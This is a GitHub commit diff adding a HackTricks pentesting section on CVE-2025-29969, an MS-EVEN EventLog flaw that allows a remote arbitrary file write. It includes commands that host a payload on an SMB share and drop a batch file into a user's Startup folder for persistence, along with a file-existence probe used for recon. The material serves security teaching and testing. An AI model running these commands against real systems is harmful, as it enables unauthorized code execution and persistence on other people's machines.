Skip to content

Commit f60651e

Browse files
authored
Merge pull request #2010 from HackTricks-wiki/update_EventLogin_-_CVE-2025-29969_20260316_130744
EventLogin - CVE-2025-29969
2 parents 67c7b5c + 38030a4 commit f60651e

1 file changed

Lines changed: 32 additions & 0 deletions

File tree

src/network-services-pentesting/135-pentesting-msrpc.md

Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -69,6 +69,36 @@ All options except `tcp_dcerpc_auditor` are specifically designed for targeting
6969
- **Named Pipe**: `\pipe\epmapper`
7070
- **Description**: DCOM interface, used for brute-force password grinding and information gathering via WM.
7171

72+
73+
### MS-EVEN (EventLog Remoting) primitives
74+
75+
The **MS-EVEN** RPC interface (named pipe `\pipe\even`) exposes Eventlog operations. SafeBreach’s **CVE-2025-29969 (EventLog-in)** analysis shows a **TOCTOU** flaw in MS-EVEN that lets an **authenticated low-privileged** user trigger a **remote arbitrary file write** on the target: attacker-chosen content written to an attacker-chosen path without needing Administrator rights for the remote write.
76+
77+
Operational pattern (PoC workflow): stage a **valid EVTX** plus your payload on an SMB share, then race the MS-EVEN logic so the target fetches the SMB-hosted file and writes it to the chosen path.
78+
79+
```bash
80+
impacket-smbserver -smb2support Share /tmp/safebreach
81+
```
82+
83+
The published PoC uses a **hard-coded SMB share name** (`Share`), so if you change it you must also update the script.
84+
85+
```bash
86+
python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\Users\lowuser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\target.bat"
87+
```
88+
89+
A common chain is to drop into a **per-user Startup folder** for persistence and execution on the next logon (execution occurs in that user context).
90+
91+
#### MS-EVEN CreateFile-style primitive for recon
92+
93+
MS-EVEN also exposes a **file open/create** primitive (described in the PoC as `CreateFile`) that can be used by any authenticated user to **probe whether a remote file or directory exists**. This is useful for software discovery by checking common install paths (e.g., `C:\Program Files\<Vendor>`):
94+
95+
```bash
96+
python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"
97+
98+
Result:
99+
FILE_EXISTS_AND_IS_DIRECTORY
100+
```
101+
72102
### Identifying IP addresses
73103

74104
Using [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver), comes from [Airbus research](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/) is possible to abuse the _**ServerAlive2**_ method inside the _**IOXIDResolver**_ interface.
@@ -226,6 +256,8 @@ A single out-of-bounds write or unexpected exception will be surfaced immediatel
226256

227257
## References
228258

259+
- [EventLogin-CVE-2025-29969 (SafeBreach-Labs)](https://github.com/SafeBreach-Labs/EventLogin-CVE-2025-29969)
260+
- [EventLog-in: Propagating With Weak Credentials Using the Eventlog Service in Microsoft Windows](https://www.safebreach.com/blog/safebreach_labs_discovers_cve-2025-29969/)
229261
- [Automating MS-RPC vulnerability research (2025, Incendium.rocks)](https://www.incendium.rocks/posts/Automating-MS-RPC-Vulnerability-Research/)
230262
- [MS-RPC-Fuzzer – context-aware RPC fuzzer](https://github.com/warpnet/MS-RPC-Fuzzer)
231263
- [NtObjectManager PowerShell module](https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/tree/master/NtObjectManager)

0 commit comments

Comments
 (0)